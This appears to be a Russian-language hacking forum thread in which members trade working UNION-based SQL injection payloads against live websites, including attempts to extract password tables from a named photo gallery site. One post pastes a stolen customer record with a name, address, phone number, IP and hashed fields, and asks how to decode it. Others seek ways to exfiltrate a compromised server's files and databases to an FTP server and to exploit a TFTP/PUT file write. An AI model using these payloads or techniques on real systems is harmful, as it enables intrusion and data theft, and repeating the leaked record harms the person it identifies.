Pashkela, можно попытаться TABLE_SCHEMA и TABLE_NAME ну с лимитом то почему не работало в этом случае, хз в принципе конечно да, это не нужно
На сервере где залит шелл стойт safe-mode Задача слить все файлы и БД Как это можно сделать, слышал что существуют архиваторы написанные на PHP Или чтонить что переместит файлы на мой ftp
с XSS дел почти никогда не имел,но на одном сайте нашел, интересно пассивная или актив? Что то можно выжить или нет?
Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля -36))+union+select+1,2,3,4,unhex(hex(group_concat(table_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.columns+where+column_name+like+0x25757365726e616d6525--+ -36))+union+select+1,2,3,4,5,unhex(hex(group_concat(column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.columns+where+table_name=0x657870745f75736572--+ -36))+union+select+1,2,3,4,unhex(hex(username)),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
Code: (0000000039, 'jeffery', 'brown', 'pyramid lock', '[email protected]', '26434 lorenz', '', 'madison heights', 'mi', '48071', 'US', '248-837-9605', 'uKrNsZydbo8=', '0.00', '', '2008-10-18', '', 0, 'MasterCard', 0xad0dcd773619ed1d768fbeb219b14c3a0a23595ef189088ac8ba3ce3a5001944, 0x0a23595ef189088ac8ba3ce3a5001944, 0x5ea4b9f8995d33027b5f3e4b154e8d54, 0x0a23595ef189088ac8ba3ce3a5001944, '2009-09-15 19:05:24', '68.43.87.206', 'c-68-43-87-206.hsd1.mi.comcast.net', 'Active', ''), В чем это зашифровано? Code: 0x5ea4b9f8995d33027b5f3e4b154e8d54 Пробовал как Hex неполучается
Всем привет, 2 вопроса 1. Бесплатный хостинг для XSS и 2. сканер XSS багов на сайте. Прошу помочь. Благодарен Axelhack.
Подскажите, сканер выплюнул: С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске. В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать? ФТП может висеть на удп? если да,то как приконектиться?
кто может подсказать по скуле в http://www.pngbd.com/photos/showgallery.php?cat=1' Никак не выходит, толи поля не подпираются, толи фильтр какой-то
тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд почему я подумал про скобку ))) http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3,4%23
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда,лить ток тхт файлы).Редкая довольно-таки вещь.
http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,password,3,4+from+matryx_photos.users%23 видимо стоят фильтры на password,users итд есть идеи как обойти?
Емпти сет. Эта табличка пустая 999')+UNION+SELECT+1,count(*),3,4+from+users--+ Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
